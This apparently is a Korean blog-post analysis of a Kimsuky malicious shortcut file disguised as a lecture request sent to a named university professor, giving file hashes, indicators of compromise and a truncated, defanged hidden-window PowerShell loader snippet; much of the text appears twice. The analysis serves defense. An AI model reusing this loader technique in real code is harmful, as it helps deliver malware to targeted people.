북한 해킹 단체 김수키(Kimsuky)에서 만든 악성코드-강연의뢰서_엄구호 교수님.docx.lnk(2024.6.4)
Contents
오늘은 우리 북한 해킹 단체 김수키(Kimsuky)에서 만든 악성코드인 강연의뢰서_엄구호 교수님.docx.lnk(2024.6.4)에 대해 글을 적어 보겠습니다.
2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 대상 공격으로 하는 북한의 해킹 단체 Thallium, APT37과 관련된 해킹 단체입니다.
뭐~전 세계적으로 유명하니까? 해당 설명은 건너 띄고 해당 악성코드는 한양대학교 서울캠퍼스 국제학부 교수이신 분을 대상으로 한 것 같고 제목 보니까 강연의뢰서라고 돼 있는 것이 워드 파일인 것처럼 해서 해당 교수님에게 강연 의뢰서인 것처럼 해서 해킹을 시도하는 것 같습니다.
악성코드 해쉬값
파일명:강연의뢰서_엄구호 교수님.docx.lnk.lnk
사이즈:1.01 MB
MD5:52d073c181531c7f0b8b3aa764c6551d
SHA-1:a64e0a2e0a9b213966e6325efecc5e0b187f95f9
SHA-256:3065b8e4bb91b4229d1cea671e8959da8be2e7482067e1dd03519c882738045e
파워셀 을 대충 보니 123.docx 이라는 최종적으로 해당 워드 문서를 보여 주게 돼 있고 구글 드라이브 와 드롭박스에서 악성코드를 업로드 해서 해당 부분을 통해서 악성코드를 다운로드 하는 것을 추측할 수가 있고 파워셀을 보면 다음과 같습니다.
악성 Powershell 코드
/c powershell -windowstyle h(i)dden -nop -No(P)rofile -NonInteractive -c "$t(m)p = '%temp%';$lnk(p)ath = Get -ChildItem *(.)lnk;for(e)ach ($path in $ln(k)path) { if ($ path.l(e)ngth -eq 0x(0)0103CFB) { $ln(k)path = $path;}}fo(r) each ($item in $lnkpath) { $(l)nkpath = $item(.)Name;}$InputStr eam = New(-)Object System.IO.F(i)leStream($lnkpath, …
2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 대상 공격으로 하는 북한의 해킹 단체 Thallium, APT37과 관련된 해킹 단체입니다.
뭐~전 세계적으로 유명하니까? 해당 설명은 건너 띄고 해당 악성코드는 한양대학교 서울캠퍼스 국제학부 교수이신 분을 대상으로 한 것 같고 제목 보니까 강연의뢰서라고 돼 있는 것이 워드 파일인 것처럼 해서 해당 교수님에게 강연 의뢰서인 것처럼 해서 해킹을 시도하는 것 같습니다.
악성코드 해쉬값
파일명:강연의뢰서_엄구호 교수님.docx.lnk.lnk
사이즈:1.01 MB
MD5:52d073c181531c7f0b8b3aa764c6551d
SHA-1:a64e0a2e0a9b213966e6325efecc5e0b187f95f9
SHA-256:3065b8e4bb91b4229d1cea671e8959da8be2e7482067e1dd03519c882738045e
파워셀 을 대충 보니 123.docx 이라는 최종적으로 해당 워드 문서를 보여 주게 돼 있고 구글 드라이브 와 드롭박스에서 악성코드를 업로드 해서 해당 부분을 통해서 악성코드를 다운로드 하는 것을 추측할 수가 있고 파워셀을 보면 다음과 같습니다.
악성 Powershell 코드
/c powershell -windowstyle h(i)dden -nop -No(P)rofile -NonInteractive -c "$t(m)p = '%temp%';$lnk(p)ath = Get -ChildItem *(.)lnk;for(e)ach ($path in $ln(k)path) { if ($ path.l(e)ngth -eq 0x(0)0103CFB) { $ln(k)path = $path;}}fo(r) each ($item in $lnkpath) { $(l)nkpath = $item(.)Name;}$InputStr eam = New(-)Object System.IO.F(i)leStream($lnkpath, …
IoC
3065b8e4bb91b4229d1cea671e8959da8be2e7482067e1dd03519c882738045e
52d073c181531c7f0b8b3aa764c6551d
a64e0a2e0a9b213966e6325efecc5e0b187f95f9
52d073c181531c7f0b8b3aa764c6551d
a64e0a2e0a9b213966e6325efecc5e0b187f95f9